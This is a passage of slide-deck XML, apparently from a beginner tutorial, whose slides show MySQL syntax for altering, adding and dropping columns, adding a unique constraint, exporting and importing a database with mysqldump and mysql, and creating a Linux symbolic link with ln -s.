              </a:rPr>
              <a:t>ALTER  TABLE   &lt;tableName&gt;   </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHANGE  &lt;OldCol&gt;  &lt;NewCol&gt;   &lt;DataType&gt;   &lt;ConstaintName&gt; ;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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sp>
        <p:nvSpPr>
          <p:cNvPr id="2784" name="Google Shape;2784;p453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="612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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to modify </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>columN name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3400">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2785" name="Google Shape;2785;p453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127250" y="2103075"/>
            <a:ext cx="7749600" cy="2394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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER  TABLE   &lt;tableName&gt;   </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MODIFY &lt;ColName&gt;   &lt;DataType&gt;   &lt;ConstaintName&gt; ;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2786" name="Google Shape;2786;p453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2296625" y="1526750"/>
            <a:ext cx="4056000" cy="50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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Alias</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279525" y="264775"/>
            <a:ext cx="875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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Symbolic Link(Linux) / Shortcut(Windows)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827325" y="1032625"/>
            <a:ext cx="7659600" cy="32865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b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ln &lt;options&gt; &lt;original&gt; &lt;shortcut&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ln    -s         original.txt      link.txt</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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0" name="Shape 2790"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2791" name="Google Shape;2791;p454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="993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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to add new column in the existing table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2792" name="Google Shape;2792;p454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1569700"/>
            <a:ext cx="91440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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER  TABLE   &lt;tableName&gt;   ADD   &lt;ColName&gt;   &lt;DataType&gt;   &lt;ConstaintName&gt; AFTER  &lt;ColName&gt;;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="993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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to add new column at the first column location in the existing table?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2798" name="Google Shape;2798;p455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1569700"/>
            <a:ext cx="91440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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER  TABLE   &lt;tableName&gt;    ADD   &lt;ColName&gt;  &lt;DataType&gt;                                &lt;ConstaintName&gt; FIRST;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="D63200"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="D63200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alter       table     employees_tbl  add     id                  int unsigned auto_increment     primary key           first;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="D63200"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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456"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="993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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to remove column from the existing table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2804" name="Google Shape;2804;p456"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1569700"/>
            <a:ext cx="91440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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER  TABLE   &lt;tableName&gt;   DROP  &lt;ColName&gt; ;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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457"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="993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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to export database?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2810" name="Google Shape;2810;p457"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301425" y="1566400"/>
            <a:ext cx="84483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500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqldump -u [username] -p [database_name] &gt; [output_file.sql]</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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4" name="Shape 2814"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2815" name="Google Shape;2815;p458"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356250" y="9937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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to import database?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2816" name="Google Shape;2816;p458"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301425" y="1566400"/>
            <a:ext cx="8448300" cy="2655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2500">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql -u [username] -p [database_name] &lt; [output_file.sql]</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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0" name="Shape 2820"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2821" name="Google Shape;2821;p459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="5000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rPr>
              <a:t>How to add unique constraint  to existing table?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2822" name="Google Shape;2822;p459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646075" y="1582175"/>
            <a:ext cx="7738800" cy="350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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER TABLE your_table_name</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADD CONSTRAINT your_constraint_name UNIQUE (column1, column2, ...);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER TABLE product_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADD CONSTRAINT my_unique UNIQUE (pname);</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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p460"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
